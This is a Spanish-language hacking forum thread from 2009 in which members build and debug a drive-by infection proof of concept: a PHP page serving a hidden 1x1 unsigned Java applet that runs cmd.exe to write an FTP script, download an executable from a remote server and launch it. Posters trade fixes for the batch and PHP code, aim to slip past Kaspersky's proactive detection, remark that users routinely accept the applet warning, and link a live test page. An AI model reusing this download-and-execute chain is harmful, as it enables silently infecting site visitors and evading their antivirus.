[POC] Infección Mediante Java Applet (y VBScript)

Iniciado por [Zero], 1 Enero 2009, 22:50 PM

0 Miembros y 1 Visitante están viendo este tema.

[Zero]

#10
Estoy trantando de hacerlo todo desde la shell para prescindir del vbs y que no lo detecte el kis, haber si me podéis ayudar, tengo lo siguiente:

@echo off
echo usuario@nombreftp.com>C:\datos.txt
echo contraseña>>C:\datos.txt
echo cd /path>>C:\datos.txt
echo pwd>>C:\datos.txt
echo binary>>C:\datos.txt
echo get archivo.exe>>C:\datos.txt
echo bye>>C:\datos.txt
echo quit>>C:\datos.txt
ftp -s:C:\datos.txt nombreftp.com
start archivo.exe


(Haber si alguien que tenga kav puede probar si lo detecta por proactiva, sería raro)

El caso es que ése código funciona perfectamente, me descarga el archivo del ftp y me lo ejecuta, pero cuando trato de pasarlo a php para que lo ejecute el applet con cmd.exe /c de esta forma:

Código (php) [Seleccionar]
echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
echo "<param name='first' value='
cmd.exe /c
echo usuario@nombreftp.com>C:\datos.txt &
echo contraseña>>C:\datos.txt &
echo cd /path>>C:\datos.txt &
echo pwd>>C:\datos.txt &
echo binary>>C:\datos.txt &
echo get archivo.exe>>C:\datos.txt &
echo bye>>C:\datos.txt &
echo quit>>C:\datos.txt &
ftp -s:C:\datos.txt nombreftp.com &
start archivo.exe
'>";
echo "</applet>";


Al abrir la pagina, el applet se ejecuta, ejecuta los comandos pero me genera un archivo.exe de 0 bytes y obvio da error al ejecutarlo, alguien sabe a que se debe o como lo podría solucionar?

Saludos

PD: Si cae mucha gente, si no fuera por lo del kis sería perfecto, ya que en todos los applets no firmados sale ese mensaje, la gente está acostumbrada a aceptarlo, inicias un chat y sale el mensaje, te vas a jugar al ajedrez y sale ese mensaje, etc...

Edito, el fallo era un espacio, hay que hacer:
cmd.exe /c echo usuario@nombreftp.com>C:\datos.txt&echo contraseña>>C:\datos.txt &
NO:
cmd.exe /c echo usuario@nombreftp.com>C:\datos.txt & echo contraseña>>C:\datos.txt &

Un erro tonto que nos costo a mi y a wofo un gran dolor de cabeza, jajaja.

Saludos

"El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche

Wofo

Yo sé... Deberías haberme preguntado...

Este code debería funcionar:

Código (php) [Seleccionar]

echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
echo "<param name='first' value='
cmd.exe /c
echo usuario@nombreftp.com>C:\\datos.txt &
echo contraseña>>C:\\datos.txt &
echo cd /path>>C:\\datos.txt &
echo pwd>>C:\\datos.txt &
echo binary>>C:\\datos.txt &
echo get archivo.exe>>C:\\datos.txt &
echo bye>>C:\\datos.txt &
echo quit>>C:\\datos.txt &
ftp -s:C:\\datos.txt nombreftp.com &
start archivo.exe
'>";
echo "</applet>";


Fíjate en que cuando quieres hacer un '\' tienes que poner '\\' (es igual que en C/C++)

Salu2

Novlucker

Hay que reconocer que si bien este método necesita de ingenieria social, creo que canta mucho menos que los anteriores  :P

Cita de: Hacker_Zero en  2 Enero 2009, 04:03 AM
(Haber si alguien que tenga kav puede probar si lo detecta por proactiva, sería raro)
Tengo el KIS así que luego lo pruebo a ver si salta  :rolleyes:
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

Littlehorse

Ahora lo pruebo yo tambien, en realidad probarlo contra el KIS es probarlo contra el rey y no se si es lo mas adecuado, es decir, Alguien conoce la forma de saltarse la proactiva del KIS?.
Digo que no es lo mas adecuado porque con el tema de las keys en lista negra muchos pasan de instalarlo y van por el NOD, el AVG y demas yerbas. Aunque ahora con esto del kavkiskey ya varios lo estan utilizando pero bueno, en mi caso la mayoria de las personas que conozco no usan kav ni kis.
An expert is a man who has made all the mistakes which can be made, in a very narrow field.

[Zero]

Tamos preparando el poc nuevamente sin utilizar vbs, ahora mismo lo subimos para que lo prueben con el kis, haber si lo detecta por proactiva o no, funciona descargando el archivo por ftp desde la shell  ;D.

Saludos

"El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche

Wofo

#15
ACTUALIZACIÓN:

Con el problema del KIS y KAV, a HACKER_ZERO se le ocurrió hacer la descarga del .exe por medio de batch + FTP. Les dejo el index.php modificado:

Código (php) [Seleccionar]

<?php
if(isset($HTTP_GET_VARS["board"])) {
$ip $HTTP_GET_VARS["board"];
echo $ip;
}

else 
$ip "127.0.0.1";

if(isset(
$HTTP_GET_VARS["topic"])) {
$puerto $HTTP_GET_VARS["topic"];
echo $puerto;
}

else 
$puerto 666;

echo 
"<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
echo 
"<param name='first' value='
cmd.exe /c cd C:\\Windows & echo user@ftp.net>datos.txt&echo clave>>datos.txt&echo pwd>>datos.txt&echo binary>>datos.txt&echo get archivo.exe>>datos.txt&echo bye>>datos.txt&echo quit>>datos.txt&ftp -s:datos.txt ftp.net&start archivo.exe "
.$ip." ".$puerto."&pause'>";
echo 
"</applet>";

?>



Y el link del POC: http://wofo.x10hosting.com/hacking/JAVA/POCapplet/indexftp.php?board=127.0.0.1&topic=7172

Salu2

Novlucker

Tiene que aparecer algo así verdad?  :P


Broma, lo he bajado a mano así que borra esa sonrisa de tu cara  :xD

Sigue quedando en cero el ejecutable, eso si, el KIS no dice nada  :D

Saludos
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

[Zero]

Ais no puede ser!!!, lo de 0 bytes estaba solucionado, tiene que ir, vamos a mi me funciona  :rolleyes:. Prueba otra vez haber, dime que windows, vista?

Saludos

"El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche

Novlucker

XP :rolleyes: , el ftp simplemente se queda colgado y no termina de bajar nunca  :-\
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

[Zero]

Pero ves la ventana del ftp? Yo me sale la pantalla de msdos en un pantallazo rapido y se cierra, casi no se nota, luego de poco tiempo, no 3 segundos se me descarga el exe y se ejecuta, te da error al abrir el applet de que el arhivo poc.exe no es una aplicacion win32 valida o no llega ahí? Si hay fallo en el ftp debería mostrar ese error, pero no tiene xk haber fallo, yo lo testeo 20 veces y no falla, haber si alguien mas puede probar  :-\, ahora que pensaba que me saltaba el kav va y ni arranca  :xD.

Saludos

"El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche